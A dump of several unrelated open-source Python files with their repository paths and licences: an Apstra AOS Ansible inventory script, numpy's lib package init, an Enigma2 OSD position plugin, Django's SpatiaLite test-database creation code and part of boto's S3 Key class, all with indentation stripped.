device = aos.Devices.find(uid=dev_id)
if 'facts' in device.value.keys():
self.add_device_facts_to_var(dev_name, device)
# Define admin State and Status
if 'user_config' in device.value.keys():
if 'admin_state' in device.value['user_config'].keys():
self.add_var_to_host(dev_name, 'admin_state', device.value['user_config']['admin_state'])
self.add_device_status_to_var(dev_name, device)
# Go over the contents data structure
for node in bp.contents['system']['nodes']:
if node['display_name'] == dev_name:
self.add_host_to_group(node['role'], dev_name)
# Check for additional attribute to import
attributes_to_import = [
'loopback_ip',
'asn',
'role',
'position',
]
for attr in attributes_to_import:
if attr in node.keys():
self.add_var_to_host(dev_name, attr, node[attr])
# if blueprint_interface is enabled in the configuration
# Collect links information
if self.aos_blueprint_int:
interfaces = dict()
for link in bp.contents['system']['links']:
# each link has 2 sides [0,1], and it's unknown which one match this device
# at first we assume, first side match(0) and peer is (1)
peer_id = 1
for side in link['endpoints']:
if side['display_name'] == dev_name:
# import local information first
int_name = side['interface']
# init dict
interfaces[int_name] = dict()
if 'ip' in side.keys():
interfaces[int_name]['ip'] = side['ip']
if 'interface' in side.keys():
interfaces[int_name]['name'] = side['interface']
if 'display_name' in link['endpoints'][peer_id].keys():
interfaces[int_name]['peer'] = link['endpoints'][peer_id]['display_name']
if 'ip' in link['endpoints'][peer_id].keys():
interfaces[int_name]['peer_ip'] = link['endpoints'][peer_id]['ip']
if 'type' in link['endpoints'][peer_id].keys():
interfaces[int_name]['peer_type'] = link['endpoints'][peer_id]['type']
else:
# if we haven't match the first time, prepare the peer_id
# for the second loop iteration
peer_id = 0
self.add_var_to_host(dev_name, 'interfaces', interfaces)
else:
for device in aos.Devices:
# If not reacheable, create by key and
# If reacheable, create by hostname
self.add_host_to_group('all', device.name)
# populate information for this host
self.add_device_status_to_var(device.name, device)
if 'user_config' in device.value.keys():
for key, value in device.value['user_config'].items():
self.add_var_to_host(device.name, key, value)
# Based on device status online|offline, collect facts as well
if device.value['status']['comm_state'] == 'on':
if 'facts' in device.value.keys():
self.add_device_facts_to_var(device.name, device)
# Check if device is associated with a blueprint
# if it's create a new group
if 'blueprint_active' in device.value['status'].keys():
if 'blueprint_id' in device.value['status'].keys():
bp = aos.Blueprints.find(uid=device.value['status']['blueprint_id'])
if bp:
self.add_host_to_group(bp.name, device.name)
# ----------------------------------------------------
# Convert the inventory and return a JSON String
# ----------------------------------------------------
data_to_print = ""
data_to_print += self.json_format_dict(self.inventory, True)
print(data_to_print)
def read_settings(self):
""" Reads the settings from the apstra_aos.ini file """
config = configparser.ConfigParser()
config.read(os.path.dirname(os.path.realpath(__file__)) + '/apstra_aos.ini')
# Default Values
self.aos_blueprint = False
self.aos_blueprint_int = True
self.aos_username = 'admin'
self.aos_password = 'admin'
self.aos_server_port = 8888
# Try to reach all parameters from File, if not available try from ENV
try:
self.aos_server = config.get('aos', 'aos_server')
except:
if 'AOS_SERVER' in os.environ.keys():
self.aos_server = os.environ['AOS_SERVER']
try:
self.aos_server_port = config.get('aos', 'port')
except:
if 'AOS_PORT' in os.environ.keys():
self.aos_server_port = os.environ['AOS_PORT']
try:
self.aos_username = config.get('aos', 'username')
except:
if 'AOS_USERNAME' in os.environ.keys():
self.aos_username = os.environ['AOS_USERNAME']
try:
self.aos_password = config.get('aos', 'password')
except:
if 'AOS_PASSWORD' in os.environ.keys():
self.aos_password = os.environ['AOS_PASSWORD']
try:
self.aos_blueprint = config.get('aos', 'blueprint')
except:
if 'AOS_BLUEPRINT' in os.environ.keys():
self.aos_blueprint = os.environ['AOS_BLUEPRINT']
try:
if config.get('aos', 'blueprint_interface') in ['false', 'no']:
self.aos_blueprint_int = False
except:
pass
def parse_cli_args(self):
""" Command line argument processing """
parser = argparse.ArgumentParser(description='Produce an Ansible Inventory file based on Apstra AOS')
parser.add_argument('--list', action='store_true', default=True, help='List instances (default: True)')
parser.add_argument('--host', action='store', help='Get all the variables about a specific instance')
self.args = parser.parse_args()
def json_format_dict(self, data, pretty=False):
""" Converts a dict to a JSON object and dumps it as a formatted string """
if pretty:
return json.dumps(data, sort_keys=True, indent=2)
else:
return json.dumps(data)
def add_host_to_group(self, group, host):
# Cleanup group name first
clean_group = self.cleanup_group_name(group)
# Check if the group exist, if not initialize it
if clean_group not in self.inventory.keys():
self.inventory[clean_group] = {}
self.inventory[clean_group]['hosts'] = []
self.inventory[clean_group]['vars'] = {}
self.inventory[clean_group]['hosts'].append(host)
def add_var_to_host(self, host, var, value):
# Check if the host exist, if not initialize it
if host not in self.inventory['_meta']['hostvars'].keys():
self.inventory['_meta']['hostvars'][host] = {}
self.inventory['_meta']['hostvars'][host][var] = value
def add_var_to_group(self, group, var, value):
# Cleanup group name first
clean_group = self.cleanup_group_name(group)
# Check if the group exist, if not initialize it
if clean_group not in self.inventory.keys():
self.inventory[clean_group] = {}
self.inventory[clean_group]['hosts'] = []
self.inventory[clean_group]['vars'] = {}
self.inventory[clean_group]['vars'][var] = value
def add_device_facts_to_var(self, device_name, device):
# Populate variables for this host
self.add_var_to_host(device_name,
'ansible_ssh_host',
device.value['facts']['mgmt_ipaddr'])
self.add_var_to_host(device_name, 'id', device.id)
# self.add_host_to_group('all', device.name)
for key, value in device.value['facts'].items():
self.add_var_to_host(device_name, key, value)
if key == 'os_family':
self.add_host_to_group(value, device_name)
elif key == 'hw_model':
self.add_host_to_group(value, device_name)
def cleanup_group_name(self, group_name):
"""
Clean up group name by :
- Replacing all non-alphanumeric caracter by underscore
- Converting to lowercase
"""
rx = re.compile('\W+')
clean_group = rx.sub('_', group_name).lower()
return clean_group
def add_device_status_to_var(self, device_name, device):
if 'status' in device.value.keys():
for key, value in device.value['status'].items():
self.add_var_to_host(device.name, key, value)
# Run the script
if __name__ == '__main__':
AosInventory()
| gpl-3.0 |
alephu5/Soundbyte | environment/lib/python3.3/site-packages/numpy/lib/__init__.py | 16 | 1122 | from __future__ import division, absolute_import, print_function
import math
from .info import __doc__
from numpy.version import version as __version__
from .type_check import *
from .index_tricks import *
from .function_base import *
from .nanfunctions import *
from .shape_base import *
from .stride_tricks import *
from .twodim_base import *
from .ufunclike import *
from . import scimath as emath
from .polynomial import *
#import convertcode
from .utils import *
from .arraysetops import *
from .npyio import *
from .financial import *
from .arrayterator import *
from .arraypad import *
__all__ = ['emath', 'math']
__all__ += type_check.__all__
__all__ += index_tricks.__all__
__all__ += function_base.__all__
__all__ += shape_base.__all__
__all__ += stride_tricks.__all__
__all__ += twodim_base.__all__
__all__ += ufunclike.__all__
__all__ += arraypad.__all__
__all__ += polynomial.__all__
__all__ += utils.__all__
__all__ += arraysetops.__all__
__all__ += npyio.__all__
__all__ += financial.__all__
__all__ += nanfunctions.__all__
from numpy.testing import Tester
test = Tester().test
bench = Tester().bench
| gpl-3.0 |
kingvuplus/EGAMI-E | lib/python/Plugins/SystemPlugins/OSDPositionSetup/plugin.py | 41 | 4968 | from Screens.Screen import Screen
from Components.ConfigList import ConfigListScreen
from Components.config import config, ConfigSubsection, ConfigInteger, ConfigSlider, getConfigListEntry
config.plugins.OSDPositionSetup = ConfigSubsection()
config.plugins.OSDPositionSetup.dst_left = ConfigInteger(default = 0)
config.plugins.OSDPositionSetup.dst_width = ConfigInteger(default = 720)
config.plugins.OSDPositionSetup.dst_top = ConfigInteger(default = 0)
config.plugins.OSDPositionSetup.dst_height = ConfigInteger(default = 576)
class OSDScreenPosition(Screen, ConfigListScreen):
skin = """
<screen position="0,0" size="e,e" title="OSD position setup" backgroundColor="blue">
<widget name="config" position="c-175,c-75" size="350,150" foregroundColor="black" backgroundColor="blue" />
<ePixmap pixmap="buttons/green.png" position="c-145,e-100" zPosition="0" size="140,40" alphatest="on" />
<ePixmap pixmap="buttons/red.png" position="c+5,e-100" zPosition="0" size="140,40" alphatest="on" />
<widget name="ok" position="c-145,e-100" size="140,40" valign="center" halign="center" zPosition="1" font="Regular;20" transparent="1" backgroundColor="green" />
<widget name="cancel" position="c+5,e-100" size="140,40" valign="center" halign="center" zPosition="1" font="Regular;20" transparent="1" backgroundColor="red" />
</screen>"""
def __init__(self, session):
self.skin = OSDScreenPosition.skin
Screen.__init__(self, session)
from Components.ActionMap import ActionMap
from Components.Button import Button
self["ok"] = Button(_("OK"))
self["cancel"] = Button(_("Cancel"))
self["actions"] = ActionMap(["SetupActions", "ColorActions", "MenuActions"],
{
"ok": self.keyGo,
"save": self.keyGo,
"cancel": self.keyCancel,
"green": self.keyGo,
"red": self.keyCancel,
"menu": self.closeRecursive,
}, -2)
self.list = []
ConfigListScreen.__init__(self, self.list, session = self.session)
left = config.plugins.OSDPositionSetup.dst_left.value
width = config.plugins.OSDPositionSetup.dst_width.value
top = config.plugins.OSDPositionSetup.dst_top.value
height = config.plugins.OSDPositionSetup.dst_height.value
self.dst_left = ConfigSlider(default = left, increment = 1, limits = (0, 720))
self.dst_width = ConfigSlider(default = width, increment = 1, limits = (0, 720))
self.dst_top = ConfigSlider(default = top, increment = 1, limits = (0, 576))
self.dst_height = ConfigSlider(default = height, increment = 1, limits = (0, 576))
self.list.append(getConfigListEntry(_("left"), self.dst_left))
self.list.append(getConfigListEntry(_("width"), self.dst_width))
self.list.append(getConfigListEntry(_("top"), self.dst_top))
self.list.append(getConfigListEntry(_("height"), self.dst_height))
self["config"].list = self.list
self["config"].l.setList(self.list)
def keyLeft(self):
ConfigListScreen.keyLeft(self)
self.setPreviewPosition()
def keyRight(self):
ConfigListScreen.keyRight(self)
self.setPreviewPosition()
def setPreviewPosition(self):
setPosition(int(self.dst_left.value), int(self.dst_width.value), int(self.dst_top.value), int(self.dst_height.value))
def keyGo(self):
config.plugins.OSDPositionSetup.dst_left.value = self.dst_left.value
config.plugins.OSDPositionSetup.dst_width.value = self.dst_width.value
config.plugins.OSDPositionSetup.dst_top.value = self.dst_top.value
config.plugins.OSDPositionSetup.dst_height.value = self.dst_height.value
config.plugins.OSDPositionSetup.save()
self.close()
def keyCancel(self):
setConfiguredPosition()
self.close()
def setPosition(dst_left, dst_width, dst_top, dst_height):
if dst_left + dst_width > 720:
dst_width = 720 - dst_left
if dst_top + dst_height > 576:
dst_height = 576 - dst_top
try:
file = open("/proc/stb/vmpeg/0/dst_left", "w")
file.write('%X' % dst_left)
file.close()
file = open("/proc/stb/vmpeg/0/dst_width", "w")
file.write('%X' % dst_width)
file.close()
file = open("/proc/stb/vmpeg/0/dst_top", "w")
file.write('%X' % dst_top)
file.close()
file = open("/proc/stb/vmpeg/0/dst_height", "w")
file.write('%X' % dst_height)
file.close()
except:
return
def setConfiguredPosition():
setPosition(int(config.plugins.OSDPositionSetup.dst_left.value), int(config.plugins.OSDPositionSetup.dst_width.value), int(config.plugins.OSDPositionSetup.dst_top.value), int(config.plugins.OSDPositionSetup.dst_height.value))
def main(session, **kwargs):
session.open(OSDScreenPosition)
def startup(reason, **kwargs):
setConfiguredPosition()
def Plugins(**kwargs):
from os import path
if path.exists("/proc/stb/vmpeg/0/dst_left"):
from Plugins.Plugin import PluginDescriptor
return [PluginDescriptor(name = "OSD position setup", description = "Compensate for overscan", where = PluginDescriptor.WHERE_PLUGINMENU, fnc = main),
PluginDescriptor(name = "OSD position setup", description = "", where = PluginDescriptor.WHERE_SESSIONSTART, fnc = startup)]
return []
| gpl-2.0 |
onceuponatimeforever/oh-mainline | vendor/packages/Django/django/contrib/gis/db/backends/spatialite/creation.py | 100 | 5765 | import os
from django.conf import settings
from django.core.cache import get_cache
from django.core.cache.backends.db import BaseDatabaseCache
from django.core.exceptions import ImproperlyConfigured
from django.db.backends.sqlite3.creation import DatabaseCreation
class SpatiaLiteCreation(DatabaseCreation):
def create_test_db(self, verbosity=1, autoclobber=False):
"""
Creates a test database, prompting the user for confirmation if the
database already exists. Returns the name of the test database created.
This method is overloaded to load up the SpatiaLite initialization
SQL prior to calling the `syncdb` command.
"""
# Don't import django.core.management if it isn't needed.
from django.core.management import call_command
test_database_name = self._get_test_db_name()
if verbosity >= 1:
test_db_repr = ''
if verbosity >= 2:
test_db_repr = " ('%s')" % test_database_name
print("Creating test database for alias '%s'%s..." % (self.connection.alias, test_db_repr))
self._create_test_db(verbosity, autoclobber)
self.connection.close()
self.connection.settings_dict["NAME"] = test_database_name
self.connection.ops.confirm_spatial_components_versions()
# Need to load the SpatiaLite initialization SQL before running `syncdb`.
self.load_spatialite_sql()
# Report syncdb messages at one level lower than that requested.
# This ensures we don't get flooded with messages during testing
# (unless you really ask to be flooded)
call_command('syncdb',
verbosity=max(verbosity - 1, 0),
interactive=False,
database=self.connection.alias,
load_initial_data=False)
# We need to then do a flush to ensure that any data installed by
# custom SQL has been removed. The only test data should come from
# test fixtures, or autogenerated from post_syncdb triggers.
# This has the side effect of loading initial data (which was
# intentionally skipped in the syncdb).
call_command('flush',
verbosity=max(verbosity - 1, 0),
interactive=False,
database=self.connection.alias)
from django.core.cache import get_cache
from django.core.cache.backends.db import BaseDatabaseCache
for cache_alias in settings.CACHES:
cache = get_cache(cache_alias)
if isinstance(cache, BaseDatabaseCache):
call_command('createcachetable', cache._table, database=self.connection.alias)
# Get a cursor (even though we don't need one yet). This has
# the side effect of initializing the test database.
cursor = self.connection.cursor()
return test_database_name
def sql_indexes_for_field(self, model, f, style):
"Return any spatial index creation SQL for the field."
from django.contrib.gis.db.models.fields import GeometryField
output = super(SpatiaLiteCreation, self).sql_indexes_for_field(model, f, style)
if isinstance(f, GeometryField):
gqn = self.connection.ops.geo_quote_name
qn = self.connection.ops.quote_name
db_table = model._meta.db_table
output.append(style.SQL_KEYWORD('SELECT ') +
style.SQL_TABLE('AddGeometryColumn') + '(' +
style.SQL_TABLE(gqn(db_table)) + ', ' +
style.SQL_FIELD(gqn(f.column)) + ', ' +
style.SQL_FIELD(str(f.srid)) + ', ' +
style.SQL_COLTYPE(gqn(f.geom_type)) + ', ' +
style.SQL_KEYWORD(str(f.dim)) + ', ' +
style.SQL_KEYWORD(str(int(not f.null))) +
');')
if f.spatial_index:
output.append(style.SQL_KEYWORD('SELECT ') +
style.SQL_TABLE('CreateSpatialIndex') + '(' +
style.SQL_TABLE(gqn(db_table)) + ', ' +
style.SQL_FIELD(gqn(f.column)) + ');')
return output
def load_spatialite_sql(self):
"""
This routine loads up the SpatiaLite SQL file.
"""
if self.connection.ops.spatial_version[:2] >= (2, 4):
# Spatialite >= 2.4 -- No need to load any SQL file, calling
# InitSpatialMetaData() transparently creates the spatial metadata
# tables
cur = self.connection._cursor()
cur.execute("SELECT InitSpatialMetaData()")
else:
# Spatialite < 2.4 -- Load the initial SQL
# Getting the location of the SpatiaLite SQL file, and confirming
# it exists.
spatialite_sql = self.spatialite_init_file()
if not os.path.isfile(spatialite_sql):
raise ImproperlyConfigured('Could not find the required SpatiaLite initialization '
'SQL file (necessary for testing): %s' % spatialite_sql)
# Opening up the SpatiaLite SQL initialization file and executing
# as a script.
with open(spatialite_sql, 'r') as sql_fh:
cur = self.connection._cursor()
cur.executescript(sql_fh.read())
def spatialite_init_file(self):
# SPATIALITE_SQL may be placed in settings to tell GeoDjango
# to use a specific path to the SpatiaLite initilization SQL.
return getattr(settings, 'SPATIALITE_SQL',
'init_spatialite-%s.%s.sql' %
self.connection.ops.spatial_version[:2])
| agpl-3.0 |
bleib1dj/boto | boto/s3/key.py | 22 | 82475 | # Copyright (c) 2006-2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2011, Nexenta Systems Inc.
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import email.utils
import errno
import hashlib
import mimetypes
import os
import re
import base64
import binascii
import math
from hashlib import md5
import boto.utils
from boto.compat import BytesIO, six, urllib, encodebytes
from boto.exception import BotoClientError
from boto.exception import StorageDataError
from boto.exception import PleaseRetryException
from boto.provider import Provider
from boto.s3.keyfile import KeyFile
from boto.s3.user import User
from boto import UserAgent
from boto.utils import compute_md5, compute_hash
from boto.utils import find_matching_headers
from boto.utils import merge_headers_by_name
class Key(object):
"""
Represents a key (object) in an S3 bucket.
:ivar bucket: The parent :class:`boto.s3.bucket.Bucket`.
:ivar name: The name of this Key object.
:ivar metadata: A dictionary containing user metadata that you
wish to store with the object or that has been retrieved from
an existing object.
:ivar cache_control: The value of the `Cache-Control` HTTP header.
:ivar content_type: The value of the `Content-Type` HTTP header.
:ivar content_encoding: The value of the `Content-Encoding` HTTP header.
:ivar content_disposition: The value of the `Content-Disposition` HTTP
header.
:ivar content_language: The value of the `Content-Language` HTTP header.
:ivar etag: The `etag` associated with this object.
:ivar last_modified: The string timestamp representing the last
time this object was modified in S3.
:ivar owner: The ID of the owner of this object.
:ivar storage_class: The storage class of the object. Currently, one of:
STANDARD | REDUCED_REDUNDANCY | GLACIER
:ivar md5: The MD5 hash of the contents of the object.
:ivar size: The size, in bytes, of the object.
:ivar version_id: The version ID of this object, if it is a versioned
object.
:ivar encrypted: Whether the object is encrypted while at rest on
the server.
"""
DefaultContentType = 'application/octet-stream'
RestoreBody = """<?xml version="1.0" encoding="UTF-8"?>
<RestoreRequest xmlns="http://s3.amazonaws.com/doc/2006-03-01">
<Days>%s</Days>
</RestoreRequest>"""
BufferSize = boto.config.getint('Boto', 'key_buffer_size', 8192)
# The object metadata fields a user can set, other than custom metadata
# fields (i.e., those beginning with a provider-specific prefix like
# x-amz-meta).
base_user_settable_fields = set(["cache-control", "content-disposition",
"content-encoding", "content-language",
"content-md5", "content-type",
"x-robots-tag", "expires"])
_underscore_base_user_settable_fields = set()
for f in base_user_settable_fields:
_underscore_base_user_settable_fields.add(f.replace('-', '_'))
# Metadata fields, whether user-settable or not, other than custom
# metadata fields (i.e., those beginning with a provider specific prefix
# like x-amz-meta).
base_fields = (base_user_settable_fields |
set(["last-modified", "content-length", "date", "etag"]))
def __init__(self, bucket=None, name=None):
self.bucket = bucket
self.name = name
self.metadata = {}
self.cache_control = None
self.content_type = self.DefaultContentType
self.content_encoding = None
self.content_disposition = None
self.content_language = None
self.filename = None
self.etag = None
self.is_latest = False
self.last_modified = None
self.owner = None
self._storage_class = None
self.path = None
self.resp = None
self.mode = None
self.size = None
self.version_id = None
self.source_version_id = None
self.delete_marker = False
self.encrypted = None
# If the object is being restored, this attribute will be set to True.
# If the object is restored, it will be set to False. Otherwise this
# value will be None. If the restore is completed (ongoing_restore =
# False), the expiry_date will be populated with the expiry date of the
# restored object.
self.ongoing_restore = None
self.expiry_date = None
self.local_hashes = {}
def __repr__(self):
if self.bucket:
name = u'<Key: %s,%s>' % (self.bucket.name, self.name)
else:
name = u'<Key: None,%s>' % self.name
# Encode to bytes for Python 2 to prevent display decoding issues
if not isinstance(name, str):
name = name.encode('utf-8')
return name
def __iter__(self):
return self
@property
def provider(self):
provider = None
if self.bucket and self.bucket.connection:
provider = self.bucket.connection.provider
return provider
def _get_key(self):
return self.name
def _set_key(self, value):
self.name = value
key = property(_get_key, _set_key);
def _get_md5(self):
if 'md5' in self.local_hashes and self.local_hashes['md5']:
return binascii.b2a_hex(self.local_hashes['md5'])
def _set_md5(self, value):
if value:
self.local_hashes['md5'] = binascii.a2b_hex(value)
elif 'md5' in self.local_hashes:
self.local_hashes.pop('md5', None)
md5 = property(_get_md5, _set_md5);
def _get_base64md5(self):
if 'md5' in self.local_hashes and self.local_hashes['md5']:
md5 = self.local_hashes['md5']
if not isinstance(md5, bytes):
md5 = md5.encode('utf-8')
return binascii.b2a_base64(md5).decode('utf-8').rstrip('\n')
def _set_base64md5(self, value):
if value:
if not isinstance(value, six.string_types):
value = value.decode('utf-8')
self.local_hashes['md5'] = binascii.a2b_base64(value)
elif 'md5' in self.local_hashes:
del self.local_hashes['md5']
base64md5 = property(_get_base64md5, _set_base64md5);
def _get_storage_class(self):
if self._storage_class is None and self.bucket:
# Attempt to fetch storage class
list_items = list(self.bucket.list(self.name.encode('utf-8')))
if len(list_items) and getattr(list_items[0], '_storage_class',
None):
self._storage_class = list_items[0]._storage_class
else:
# Key is not yet saved? Just use default...
self._storage_class = 'STANDARD'
return self._storage_class
def _set_storage_class(self, value):
self._storage_class = value
storage_class = property(_get_storage_class, _set_storage_class)
def get_md5_from_hexdigest(self, md5_hexdigest):
"""
A utility function to create the 2-tuple (md5hexdigest, base64md5)
from just having a precalculated md5_hexdigest.
"""
digest = binascii.unhexlify(md5_hexdigest)
base64md5 = encodebytes(digest)
if base64md5[-1] == '\n':
base64md5 = base64md5[0:-1]
return (md5_hexdigest, base64md5)
def handle_encryption_headers(self, resp):
provider = self.bucket.connection.provider
if provider.server_side_encryption_header:
self.encrypted = resp.getheader(
provider.server_side_encryption_header, None)
else:
self.encrypted = None
def handle_version_headers(self, resp, force=False):
provider = self.bucket.connection.provider
# If the Key object already has a version_id attribute value, it
# means that it represents an explicit version and the user is
# doing a get_contents_*(version_id=<foo>) to retrieve another
# version of the Key. In that case, we don't really want to
# overwrite the version_id in this Key object. Comprende?
if self.version_id is None or force:
self.version_id = resp.getheader(provider.version_id, None)
self.source_version_id = resp.getheader(provider.copy_source_version_id,
None)
if resp.getheader(provider.delete_marker, 'false') == 'true':
self.delete_marker = True
else:
self.delete_marker = False
def handle_restore_headers(self, response):
provider = self.bucket.connection.provider
header = response.getheader(provider.restore_header)
if header is None:
return
parts = header.split(',', 1)
for part in parts:
key, val = [i.strip() for i in part.split('=')]
val = val.replace('"', '')
if key == 'ongoing-request':
self.ongoing_restore = True if val.lower() == 'true' else False
elif key == 'expiry-date':
self.expiry_date = val
def handle_addl_headers(self, headers):
"""
Used by Key subclasses to do additional, provider-specific
processing of response headers. No-op for this base class.
"""
pass
def open_read(self, headers=None, query_args='',
override_num_retries=None, response_headers=None):
"""
Open this key for reading
:type headers: dict
:param headers: Headers to pass in the web request
:type query_args: string
:param query_args: Arguments to pass in the query string
(ie, 'torrent')
:type override_num_retries: int
:param override_num_retries: If not None will override configured
num_retries parameter for underlying GET.
:type response_headers: dict
:param response_headers: A dictionary containing HTTP
headers/values that will override any headers associated
with the stored object in the response. See
http://goo.gl/EWOPb for details.
"""
if self.resp is None:
self.mode = 'r'
provider = self.bucket.connection.provider
self.resp = self.bucket.connection.make_request(
'GET', self.bucket.name, self.name, headers,
query_args=query_args,
override_num_retries=override_num_retries)
if self.resp.status < 199 or self.resp.status > 299:
body = self.resp.read()
raise provider.storage_response_error(self.resp.status,
self.resp.reason, body)
response_headers = self.resp.msg
self.metadata = boto.utils.get_aws_metadata(response_headers,
provider)
for name, value in response_headers.items():
# To get correct size for Range GETs, use Content-Range
# header if one was returned. If not, use Content-Length
# header.
if (name.lower() == 'content-length' and
'Content-Range' not in response_headers):
self.size = int(value)
elif name.lower() == 'content-range':
end_range = re.sub('.*/(.*)', '\\1', value)
self.size = int(end_range)
elif name.lower() in Key.base_fields:
self.__dict__[name.lower().replace('-', '_')] = value
self.handle_version_headers(self.resp)
self.handle_encryption_headers(self.resp)
self.handle_restore_headers(self.resp)
self.handle_addl_headers(self.resp.getheaders())
def open_write(self, headers=None, override_num_retries=None):
"""
Open this key for writing.
Not yet implemented
:type headers: dict
:param headers: Headers to pass in the write request
:type override_num_retries: int
:param override_num_retries: If not None will override configured
num_retries parameter for underlying PUT.
"""
raise BotoClientError('Not Implemented')
def open(self, mode='r', headers=None, query_args=None,
override_num_retries=None):
if mode == 'r':
self.mode = 'r'
self.open_read(headers=headers, query_args=query_args,
override_num_retries=override_num_retries)
elif mode == 'w':
self.mode = 'w'
self.open_write(headers=headers,
override_num_retries=override_num_retries)
else:
raise BotoClientError('Invalid mode: %s' % mode)
closed = False
def close(self, fast=False):
"""
Close this key.
:type fast: bool
:param fast: True if you want the connection to be closed without first
reading the content. This should only be used in cases where subsequent
calls don't need to return the content from the open HTTP connection.
Note: As explained at
http://docs.python.org/2/library/httplib.html#httplib.HTTPConnection.getresponse,
callers must read the whole response before sending a new request to the
server. Calling Key.close(fast=True) and making a subsequent request to
the server will work because boto will get an httplib exception and
close/reopen the connection.
"""
if self.resp and not fast:
self.resp.read()
self.resp = None
self.mode = None
self.closed = True
def next(self):
"""
By providing a next method, the key object supports use as an iterator.
For example, you can now say:
for bytes in key:
write bytes to a file or whatever
All of the HTTP connection stuff is handled for you.
"""
self.open_read()
data = self.resp.read(self.BufferSize)
if not data:
self.close()
raise StopIteration
return data
# Python 3 iterator support
__next__ = next
def read(self, size=0):
self.open_read()
if size == 0:
data = self.resp.read()
else:
data = self.resp.read(size)
if not data:
self.close()
return data
def change_storage_class(self, new_storage_class, dst_bucket=None,
validate_dst_bucket=True):
"""
Change the storage class of an existing key.
Depending on whether a different destination bucket is supplied
or not, this will either move the item within the bucket, preserving
all metadata and ACL info bucket changing the storage class or it
will copy the item to the provided destination bucket, also
preserving metadata and ACL info.
:type new_storage_class: string
:param new_storage_class: The new storage class for the Key.
Possible values are:
* STANDARD
* REDUCED_REDUNDANCY
:type dst_bucket: string
:param dst_bucket: The name of a destination bucket. If not
provided the current bucket of the key will be used.
:type validate_dst_bucket: bool
:param validate_dst_bucket: If True, will validate the dst_bucket
by using an extra list request.
"""
bucket_name = dst_bucket or self.bucket.name
if new_storage_class == 'STANDARD':
return self.copy(bucket_name, self.name,
reduced_redundancy=False, preserve_acl=True,
validate_dst_bucket=validate_dst_bucket)
elif new_storage_class == 'REDUCED_REDUNDANCY':
return self.copy(bucket_name, self.name,
reduced_redundancy=True, preserve_acl=True,
validate_dst_bucket=validate_dst_bucket)
else:
raise BotoClientError('Invalid storage class: %s' %
new_storage_class)
def copy(self, dst_bucket, dst_key, metadata=None,
reduced_redundancy=False, preserve_acl=False,
encrypt_key=False, validate_dst_bucket=True):
"""
Copy this Key to another bucket.
:type dst_bucket: string
:param dst_bucket: The name of the destination bucket
:type dst_key: string
:param dst_key: The name of the destination key
:type metadata: dict
:param metadata: Metadata to be associated with new key. If
metadata is supplied, it will replace the metadata of the
source key being copied. If no metadata is supplied, the
source key's metadata will be copied to the new key.
:type reduced_redundancy: bool
:param reduced_redundancy: If True, this will force the
storage class of the new Key to be REDUCED_REDUNDANCY
regardless of the storage class of the key being copied.
The Reduced Redundancy Storage (RRS) feature of S3,
provides lower redundancy at lower storage cost.
:type preserve_acl: bool
:param preserve_acl: If True, the ACL from the source key will
be copied to the destination key. If False, the
destination key will have the default ACL. Note that
preserving the ACL in the new key object will require two
additional API calls to S3, one to retrieve the current
ACL and one to set that ACL on the new object. If you
don't care about the ACL, a value of False will be
significantly more efficient.
:type encrypt_key: bool
:param encrypt_key: If True, the new copy of the object will
be encrypted on the server-side by S3 and will be stored
in an encrypted form while at rest in S3.
:type validate_dst_bucket: bool
:param validate_dst_bucket: If True, will validate the dst_bucket
by using an extra list request.
:rtype: :class:`boto.s3.key.Key` or subclass
:returns: An instance of the newly created key object
"""
dst_bucket = self.bucket.connection.lookup(dst_bucket,
validate_dst_bucket)
if reduced_redundancy:
storage_class = 'REDUCED_REDUNDANCY'
else:
storage_class = self.storage_class
return dst_bucket.copy_key(dst_key, self.bucket.name,
self.name, metadata,
storage_class=storage_class,
preserve_acl=preserve_acl,
encrypt_key=encrypt_key,
src_version_id=self.version_id)
def startElement(self, name, attrs, connection):
if name == 'Owner':
self.owner = User(self)
return self.owner
else:
return None
def endElement(self, name, value, connection):
if name == 'Key':
self.name = value
elif name == 'ETag':
self.etag = value
elif name == 'IsLatest':
if value == 'true':
self.is_latest = True
else:
self.is_latest = False
elif name == 'LastModified':
self.last_modified = value
elif name == 'Size':
self.size = int(value)
elif name == 'StorageClass':
self.storage_class = value
elif name == 'Owner':
pass
elif name == 'VersionId':
self.version_id = value
else:
setattr(self, name, value)
def exists(self, headers=None):
"""
Returns True if the key exists
:rtype: bool
:return: Whether the key exists on S3
"""
return bool(self.bucket.lookup(self.name, headers=headers))
def delete(self, headers=None):
"""
Delete this key from S3
"""
return self.bucket.delete_key(self.name, version_id=self.version_id,
headers=headers)
def get_metadata(self, name):
return self.metadata.get(name)
def set_metadata(self, name, value):
# Ensure that metadata that is vital to signing is in the correct
# case. Applies to ``Content-Type`` & ``Content-MD5``.
if name.lower() == 'content-type':
self.metadata['Content-Type'] = value
elif name.lower() == 'content-md5':
self.metadata['Content-MD5'] = value
else:
self.metadata[name] = value
if name.lower() in Key.base_user_settable_fields:
self.__dict__[name.lower().replace('-', '_')] = value
def update_metadata(self, d):
self.metadata.update(d)
# convenience methods for setting/getting ACL
def set_acl(self, acl_str, headers=None):
if self.bucket is not None:
self.bucket.set_acl(acl_str, self.name, headers=headers)
def get_acl(self, headers=None):
if self.bucket is not None:
return self.bucket.get_acl(self.name, headers=headers)
def get_xml_acl(self, headers=None):
if self.bucket is not None:
return self.bucket.get_xml_acl(self.name, headers=headers)
def set_xml_acl(self, acl_str, headers=None):
if self.bucket is not None:
return self.bucket.set_xml_acl(acl_str, self.name, headers=headers)
def set_canned_acl(self, acl_str, headers=None):
